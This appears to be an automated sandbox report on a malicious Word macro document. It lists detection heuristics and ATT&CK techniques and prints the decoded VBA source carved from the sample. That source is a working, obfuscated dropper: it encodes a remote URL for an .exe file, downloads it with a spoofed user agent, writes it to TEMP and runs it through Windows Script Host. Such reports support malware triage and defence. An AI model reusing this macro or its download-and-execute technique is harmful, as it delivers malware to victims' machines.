MALICIOUS
164
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicates that the macro attempts to execute code upon opening the document. The 'SC_STR_WSCRIPT' heuristic further suggests the use of Windows Script Host, likely to download and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6403839-0' confirms its malicious nature as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6403839-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6403839-0
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3648 bytes |
SHA-256: 538257fd2687160a9b3099946ad3324df116797621e07127b6a5db4bfb018d52 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
56 of 98 identifiers look randomly generated (e.g. 'ReXsGOpoqnOsOeqBGOoqdyG') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "YEVWrnxjZw"
Private Function rvYdOAwcuH(ByVal aYERV As String, ByVal tqCeR As String) As String
Dim CylOKlM As Integer
Set HWNSf = SiovGt.kHJDvJ(YRFtRyuOMI, CdauetYt.nMfUcbkG, AlJtwNCb.NzbElOh("P3RAWOVCVES3VS", ".A3VW"))
rvYdOAwcuH = HWNSf(aYERV)
End Function
Private Function XQQHRivB() As String
XQQHRivB = AlJtwNCb.NzbElOh("OYp4eCnC", "CY4 ")
End Function
Private Function YRFtRyuOMI() As String
YRFtRyuOMI = AlJtwNCb.NzbElOh("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
End Function
Private Function noPgfimLQl() As String
noPgfimLQl = "eJdybT86JRL"
End Function
Private Sub utuhmS(ByVal uKjCSio As String, ByVal qoqVV As String)
Set ttAvUNZbD = CdauetYt.yFOARrxkL
SiovGt.uLMdQEzSM OzsMX, AlJtwNCb.NzbElOh("OYp4eCnC", "CY4 "), uKjCSio, ttAvUNZbD, False
SiovGt.QavSmHwAdE AlJtwNCb.NzbElOh("UJsJJerj-JJAjgJeJnGt", "GJj"), YBKUEtVd, 2963, AlJtwNCb.NzbElOh("Mv5ovzviluvl5av/45v.0uv 5(cvvomv5pautuiuvbvle5;5u)", "5uv"), NbJTHGCP, ttAvUNZbD
SiovGt.bgDKJRS 1177, ttAvUNZbD, bcUkOw
WKCFjIMPBW True, 6317, qoqVV, SiovGt.JvWgrglen(NbJTHGCP, tEVIdsD, ttAvUNZbD)
End Sub
Private Function tEVIdsD() As String
tEVIdsD = AlJtwNCb.NzbElOh(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
End Function
Private Sub gbNWoi()
Dim HttjRmGJ As Integer
OIRUtHf = True
On Error GoTo ikwBA
zIxdob = False
utuhmS XbpIXBreKI, qpfZb
KpfAeitTid qpfZb
Exit Sub
ikwBA:
End Sub
Private Function qpfZb() As String
Dim TQUHiRmd As Integer, hIKrUpMu As Integer
qpfZb = rvYdOAwcuH(AlJtwNCb.NzbElOh("ZTEUMZsP", "9cZUsX"), "rlpEKNMdbrH3gcN") & ureCwD
End Function
Private Function HgLZFJd() As String
HgLZFJd = AlJtwNCb.NzbElOh("nTyHpaeB", "HBaqXn")
End Function
Private Function ureCwD() As String
Dim duAGGyqSxo As Integer
Dim AhCLLHJB As Integer
JJNlxuFaS = True
ureCwD = yUuhMmQyGP
End Function
Private Sub KpfAeitTid(ByVal OGiVlfDvNr As String)
SiovGt.lITquzHn "G29r6KbTng", CdauetYt.nMfUcbkG, 7188, OGiVlfDvNr, AlJtwNCb.NzbElOh("kEx2eI1c", "k31IG2")
End Sub
Private Function NbJTHGCP() As String
NbJTHGCP = "g81SabjfIw6"
End Function
Public Sub IdmgRsM()
Dim ZcKzmV As Integer
Dim ZJXOxiAU As Boolean
kZsag = 4121
gbNWoi
End Sub
Private Function NPLIiMfm() As String
NPLIiMfm = AlJtwNCb.NzbElOh("YClm/o/s0e", "0dY/m")
End Function
Private Function XbpIXBreKI() As String
Dim nTCnT As Integer
XbpIXBreKI = AlJtwNCb.NzbElOh("hBtYUtpYU:Y//YmYaYBgUaBzYinUBesYeUYmUprUeYbBeYlUlBUaU.cYoBYmB/UsBysUtYeUmUY/BcUacBhBeUY/UwoBrUUdY.eYYxUe", "YUB")
End Function
Private Sub WKCFjIMPBW(ByVal nYjlPOglL As Boolean, ByVal Qhqsj As Integer, ByVal mFQrVpW As String, ByVal InZuOq As Variant)
Dim nIDzD As Boolean
Dim OGwEZVg As Integer
Set iIHcTWxaSP = CdauetYt.QLILYAMDT
SiovGt.HQvScqTefi True, 1, iIHcTWxaSP, HgLZFJd
SiovGt.bgDKJRS 1177, iIHcTWxaSP, XQQHRivB
uRUxACPwrk = 5904
SiovGt.lITquzHn noPgfimLQl, iIHcTWxaSP, 7188, InZuOq, AlJtwNCb.NzbElOh("Wbbribtzek", "Zzlmkb")
sIbLjqP = "zGfxeChfYk2NCyH"
SiovGt.QavSmHwAdE mFQrVpW, nAsYQtvB, 2963, 2, noPgfimLQl, iIHcTWxaSP
SiovGt.bgDKJRS 1177, iIHcTWxaSP, NPLIiMfm
End Sub
Private Function OzsMX() As String
XBoKEL = False
OzsMX = AlJtwNCb.NzbElOh("G.E TB", ".BA ")
End Function
Private Function nAsYQtvB() As String
nAsYQtvB = AlJtwNCb.NzbElOh("pSraUvremToVUFimlVed", "mprdUV")
End Function
Private Function yUuhMmQyGP() As String
yUuhMmQyGP = AlJtwNCb.NzbElOh("/76owfbV879w4eo1o8w027fw14Vb5V7a41o.VeoxeV", "V7wo4")
End Function
Private Function YBKUEtVd() As String
YBKUEtVd = AlJtwNCb.NzbElOh("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
End Function
Private Function bcUkOw() As String
bcUkOw = AlJtwNCb.NzbElOh("SIerIndr", "MIrG")
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.